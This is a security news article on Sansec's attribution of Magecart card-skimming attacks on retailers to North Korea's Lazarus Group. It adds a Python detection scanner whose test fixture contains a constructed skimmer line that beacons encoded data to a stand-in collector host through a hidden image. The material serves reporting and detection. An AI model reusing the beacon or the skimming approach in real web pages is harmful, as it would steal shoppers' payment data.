N. Korea-based APT targeting online-payments by US & European shoppers!

The Lazarus Group, the state-sponsored hacking outfit linked to N. Korea, has added digital payment-card skimming to its repertoire, researchers observed: the group is now deploying Magecart-style skimming code on retail sites.

Lazarus is now targeting online payments made by US & European shoppers. Victims include Claire’s, the fashion accessory chain that was attacked in June, according to an analysis from Sansec issued Monday.

Malware Code

Researchers concluded that the infrastructure used in the attacks is the same as that seen in other Lazarus operations, & that “distinctive patterns in the malware code were identified that linked multiple hacks to the same actor.”

The analysis found that Lazarus was likely planting Magecart payment skimmers on major online retailer sites as early as May 2019. Magecart is an umbrella term for several distinct threat groups that inject card-skimming scripts into checkout pages, typically reusing the same kind of script across victims.

Magecart

Magento-based stores are hit most often, but Magecart skimmers also target other e-commerce platforms, including Opencart, BigCommerce, Prestashop & Salesforce.

“In order to intercept transactions, an attacker needs to modify the computer code that runs an online store,” according to the writeup. “[Lazarus Group, a.k.a. Hidden Cobra] managed to gain access to the store code of large retailers e.g. international fashion chain Claire’s.”

Spear phishing

The researchers speculated that Lazarus uses spear-phishing emails as its initial access vector, with the aim of obtaining the passwords of retail staff. With that access, the attackers inject the skimming script, which captures what shoppers enter into e-commerce checkout pages. The captured data is then sent to attacker-controlled servers via a global exfiltration network.

Tehran

“This network utilizes legitimate sites, that got hijacked & repurposed to serve as disguise for the criminal activity,” explained the firm. “The network is also used to funnel the stolen assets so they can be sold on dark web markets. Sansec has identified a number of these exfiltration nodes, which include a modelling agency from Milan, a vintage music store from Tehran & a family-run book-store from New Jersey.”

Italian Modelling Site

The campaign was uncovered last summer, when the firm found a skimmer on a US truck-parts store that used the compromised Italian modelling site to harvest payment data.

In the following months, they found the same uniquely encoded malware on several dozen stores, all of which used the same hijacked sites as loaders & card collectors.

Researchers found multiple, independent links between the recent skimming activity & previously documented North Korean hacking operations. These include shared infrastructure (the same domain registrar & DNS service, & common loader sites), as well as an odd code snippet that Sansec has not seen anywhere else.

Javascript

“The injected script customize-gtag.min.js is scrambled with a popular Javascript obfuscator. Hidden in the code, the string WTJ4cFpXNTBWRzlyWlc0OQ== is found, which is the double-base64 encoded representation of clientToken=,” according to the analysis. “This particular keyword is later used as HTTP GET parameter to send the stolen payload to the collector exfiltration node. The specific encoding & the attempt to disguise the stolen payload as ‘clientToken’ form a uniquely identifying characteristic.”

There are also common behaviour patterns, such as adding a hidden, dynamically created image to the page with the deceptive name __preloader. The image address is controlled by the attacker, & the intercepted & encoded payload is sent as an argument to this image, along with several random numbers.
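As an added illustration (not Sansec’s tooling and not code from the original article), the following Python scanner turns the two indicators quoted above into checks that can be run over a suspect script: it decodes candidate base64 literals twice and looks for the clientToken= keyword, and it flags scripts that create an image element named __preloader. The sample script it scans is constructed to contain both indicators; its obfuscated variable names and collector URL are invented and the fragment is not a working skimmer.

```python
import base64
import binascii
import re

# Indicator quoted from the Sansec writeup: "clientToken=" run through base64 twice.
CLIENT_TOKEN_IOC = "WTJ4cFpXNTBWRzlyWlc0OQ=="

# Candidate base64 literals: 16 or more alphabet characters plus optional padding.
# Shorter runs are skipped because ordinary identifiers would flood the candidate list.
B64_CANDIDATE_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Second behavioural indicator: an image element named "__preloader" whose src is
# attacker-controlled and carries the encoded card data as a query argument.
PRELOADER_NAME_RE = re.compile(r"""['"]__preloader['"]""")
IMAGE_CREATION_RE = re.compile(
    r"""new\s+Image\s*\(|createElement\s*\(\s*['"]img['"]\s*\)""", re.I
)


def double_b64_encode(text: str) -> str:
    """Encode text with base64 twice, the way the skimmer hides its keyword."""
    once = base64.b64encode(text.encode("ascii"))
    return base64.b64encode(once).decode("ascii")


def double_b64_decode(token: str) -> str:
    """Reverse double base64; raises binascii.Error or UnicodeDecodeError on junk."""
    once = base64.b64decode(token, validate=True)
    return base64.b64decode(once, validate=True).decode("ascii")


def find_double_b64_keywords(js_source: str, keywords=("clientToken=",)):
    """Return (literal, decoded) pairs for literals that decode twice to a watched keyword."""
    hits = []
    for match in B64_CANDIDATE_RE.finditer(js_source):
        literal = match.group(0)
        try:
            decoded = double_b64_decode(literal)
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64 twice over: an identifier or unrelated data
        if decoded in keywords:
            hits.append((literal, decoded))
    return hits


def has_preloader_image_beacon(js_source: str) -> bool:
    """True when the script both creates an image element and uses the __preloader name."""
    return bool(PRELOADER_NAME_RE.search(js_source)) and bool(
        IMAGE_CREATION_RE.search(js_source)
    )


def scan_script(js_source: str) -> dict:
    """Combine both indicators into a single verdict for one script body."""
    keyword_hits = find_double_b64_keywords(js_source)
    beacon = has_preloader_image_beacon(js_source)
    return {
        "double_b64_keywords": keyword_hits,
        "preloader_image_beacon": beacon,
        "suspicious": bool(keyword_hits) or beacon,
    }


# Constructed sample containing the indicators described in the article. The array
# name, the collector host and the payload variable are invented for this example.
SAMPLE_SKIMMER = """
var _0xab12=['WTJ4cFpXNTBWRzlyWlc0OQ==','__preloader','none'];
var i=document.createElement('img');i.name=_0xab12[1];i.style.display=_0xab12[2];
i.src='https://collector.invalid/i.gif?'+atob(atob(_0xab12[0]))+btoa(p)+'&r='+Math.random();
"""

# Constructed benign tag-manager snippet used as a negative control.
SAMPLE_BENIGN = """
window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}
gtag('js',new Date());gtag('config','UA-0000000-1');
"""

if __name__ == "__main__":
    print(double_b64_decode(CLIENT_TOKEN_IOC))
    print(scan_script(SAMPLE_SKIMMER))
    print(scan_script(SAMPLE_BENIGN))
```

The base64 pass uses validate=True so that identifiers which merely look like base64 (for example a 16-character method name) are rejected rather than silently decoded into garbage; a real deployment would run this over every script served by the checkout page, including those loaded from third-party hosts.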

Hijacked Sites

“Does the usage of common loader sites, & the similarity in time frame, prove that the DPRK-attributed operations are run by the same actor as the skimming operations?” the researchers said. “Theoretically, it is possible that different nefarious actors had simultaneous control over the same set of hijacked sites, but in practice, this would be extremely unlikely.

Firstly, 1000s of sites get hacked each day, making an overlap highly coincidental. Secondly, when a site gets hacked, it is common practice for a perpetrator to close the exploited vulnerability after gaining access, in order to shield the new asset from competitors.”

Digital Skimming

North Korean hacking activity is aimed at espionage but also at making money for the regime; Sansec pointed out that the move into digital skimming represents a significant expansion.

“North Korea-backed attacks were mostly restricted to banks & South Korean crypto markets, covert cyber operations that earned hackers $2 billion, according to a 2019 UN report,” concluded the report. “As Sansec’s new research shows, they have now extended their portfolio with the profitable crime of digital skimming.”
